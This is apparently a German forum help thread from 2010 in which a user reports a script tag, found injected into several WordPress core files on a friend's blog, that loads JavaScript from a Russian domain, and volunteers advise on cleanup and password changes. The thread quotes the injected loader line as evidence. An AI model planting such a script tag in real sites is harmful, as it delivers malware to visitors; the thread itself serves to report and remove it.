|
Plagegeister aller Art und deren Bekämpfung: Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.jsWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
17.09.2010, 19:44 | #1 | ||
| Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js Hallo, heute sagte mir mein Bekannter, dass er eine Fehlermeldung bekam, als er seinen Wordpress-Blog aufrufen wollte. Vielleicht ist der folgende Sachverhalt wichtig um die Verbreitung von Malware zu verhindern. Als er an der betreffenden Stelle nach dem Fehler schaute, fand er dort ein unbekanntes Script. Code:
ATTFilter <script type="text/javascript" src="h***://addonrock.ru/OCR.js"></script> <!--c9168d0ef49443a787ad05c469485c26--> - default-constants.php - default-embeds.php - default-filters.php - default-widgets.php Wenn man die im Quellcode benannte Domain öffnen will, dann kommt bei mir eine Fehlermeldung: Zitat:
Zitat:
Vielen Dank bereit für eine Antwort und schonmal ein schönes Wochenende! Stabilo |
17.09.2010, 19:50 | #2 |
/// Malware-holic | Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js ist denn wortpress und evtl. andres instaliertes zeug alles auf dem neuesten stand? ist der pc des bekannten malware frei?
__________________waren die passwörter eher einfach oder komplex? |
17.09.2010, 20:01 | #3 |
| Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js Rechner müsste eigentlich Malwarefrei sein. (Frage nochmal nach)
__________________Die Passwörter sind eigentlich komplex. Ich glaube er verwaltet und generiert diese mit Keypass. Wordpress aktualisiert er eigentlich auch immer sofort. Laut diesem google-Safe Browsing sind davon ja scheinbar mehrere/viele Seiten betroffen. |
17.09.2010, 20:19 | #4 |
/// Malware-holic | Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js deswegen denke ich ja an ne sicherheitslücke. evtl. auch serverseitig, wenn er nicht der admin ist, sollte er evtl. mal nach fragen. passwörter auf jeden fall endern. vllt die zugriffsrechte für dateien und verzeichnisse einschrenken Sicherheits-Checkliste für Webmaster - Google Webmaster-Zentrale Blog hoffe dein bekannter spricht auch englisch, da gibts einiges an tipps über die logs könnte man vllt auch was raus finden wies elaufen ist |
17.09.2010, 20:23 | #5 |
| Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js geändert, weil frage erledigt Geändert von Stabilo (17.09.2010 um 20:33 Uhr) |
17.09.2010, 20:25 | #6 |
/// Malware-holic | Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js die sollten auf dem server deines bekannten sein, müsste er eig wissen, außer er ist vllt gemietet, da kann es sein das er keinen zugriff hatt, das kann ich dir net sagen, deswegen soll er sich ja mal mit dem suport auseinander setzen ob die vllt wissen obs serverseitig lücken gibt |
17.09.2010, 20:37 | #7 |
| Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js Gut, dann erstmal vielen Dank für die Hilfe! |
20.09.2010, 22:24 | #8 |
| Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js So, wollte mich noch einmal kurz wegen dem oben beschriebenen Sachverhalt melden. Mein Bekannter hatte auch einen "Bank-Trojaner" auf dem Rechner. Sein System hat er neu aufgespielt, scheinbar hat er jedoch nicht schnell genug alle Passwörter geändert gehabt. Aus allen Seiten, an denen er gearbeitet hat tauchen die benannten Scripte auf. Was schlagt ihr im Fall Wordpress vor? Reicht es aus, wenn man alle Daten vom Server löscht, dann die Passwörter vom Server erneut ändert, Wordpress neu aufspielt? Kann man dabei die gleiche Datenbank benutzen oder können sich in einer Datenbank auch Malware-Scripte verstecken? Wie wird man denn am besten mit diesen Sche**-Dingern fertig? Wo gibt es mehr Informationen zu solcehn Trojanern, bzw wie sie funktionieren? Könnte mein Bekannter ggf. den Trojaner von mir bekommen haben (hatte einen Beitrag gepostet wegen einer Tanabfrage bei der Volksbank und dort auch alle Scanberichte beigefügt)? Hab langsam auch die Schnauze voll von der Technik. Ich glaube ich kaufe mir morgen eine Schreibmaschine... |
21.09.2010, 11:50 | #9 |
/// Malware-holic | Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js ja, löschen und dann den inhalt neu einspielen, passwörter endern natürlich und evtl. den link den ich dir gegeben hab durchlesen, da gibts noch weitere tipps. solche trojaner verbreiten sich nicht über netzwerkfreigaben usw. wenn du ihm aber ne datei gegeben hast die fragwürdig ist, dann könnte das schon klappen. ich hatte dir doch tipps zum absichern gegeben glaube ich, die kann er umsetzen auf dem pc |
22.09.2010, 22:25 | #10 |
| Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js Mit den Tipps funktioniert das soweit auch. Habe das bei mir auf dem Zweitrechner alles soweit eingestellt. MIt der Sandbox habe ich jedoch hin und wieder Probleme. Z.b. Habe ich Filezilla in der Sandbock freigegeben, bekomme aber immer eine Meldung, wenn ich mit zum Server verbinden möchte. Die Meldung sagt aber nur aus, dass es Probleme mit der Freigabe gibt. Was jedoch freigegeben werden soll nicht. Macht es Sinn zusätzlich eine Firewall zu installieren, in welcher als einzige Programm die Sandbox freigegeben wird? |
23.09.2010, 09:57 | #11 |
/// Malware-holic | Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js nein, das macht keinen sinn. hmm kann dir da grad auch nicht weiter helfen, aber filezilla sollte eig auch außerhalb der sandbox kein problem sein. |
Themen zu Unbekanntes Script auf dem Server / Wordpress / http://addonrock.ru/OCR.js |
attackierende, aufrufe, bereit, button, bösartiger code, code, computer, dateien, fehlermeldung, festgestellt, folge, frage, funktioniert, google, infektion, malware, programme, script, seite, seiten, server, software, system, trojan, unterbinden, viren, warnmeldung, warum, websites, wichtig, wordpress |